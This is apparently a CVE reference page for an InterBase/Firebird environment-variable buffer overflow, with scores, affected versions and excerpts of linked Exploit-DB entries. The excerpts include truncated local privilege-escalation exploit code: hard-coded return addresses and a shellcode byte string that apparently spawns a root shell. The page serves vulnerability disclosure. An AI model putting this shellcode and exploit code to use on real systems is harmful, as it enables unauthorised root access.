CVE-2002-2087
published 2002-12-31CVE-2002-2087: Buffer overflow in Borland InterBase 6.0 allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_drop, (2)…
PriorityP417medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.26%
66.1th percentile
Buffer overflow in Borland InterBase 6.0 allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_drop, (2) gds_lock_mgr, or (3) gds_inet_server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| borland_software | interbase | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
exploitdb·2003-05-12
CVE-2003-0281 Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
---
/* DSR-firebird.c
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - [email protected] ) )
Usage: ./DSR-firebird
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include
#include
#include
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
char dropcode[]=
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
Exploit-DB
Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow
exploitdb·2003-05-10
CVE-2002-2087 Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow
Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow
---
// source: https://www.securityfocus.com/bid/7546/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also.
A buffer overflow has been discovered in the setuid root program gds_inet_server, packaged with Firebird. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code as root.
/* DSR-olbird.c by [email protected]
Same exploit
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
exploitdb·2002-06-18
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
/* DSR-firebird.c by [email protected]
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
bash-2.05a$ ./
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
exploitdb·2002-06-15
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue. *
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
No writeups or analysis indexed.
http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00222.htmlhttp://www.iss.net/security_center/static/9392.phphttp://www.securityfocus.com/bid/5044http://www.securityfocus.com/bid/5046http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00222.htmlhttp://www.iss.net/security_center/static/9392.phphttp://www.securityfocus.com/bid/5044http://www.securityfocus.com/bid/5046
2002-12-31
Published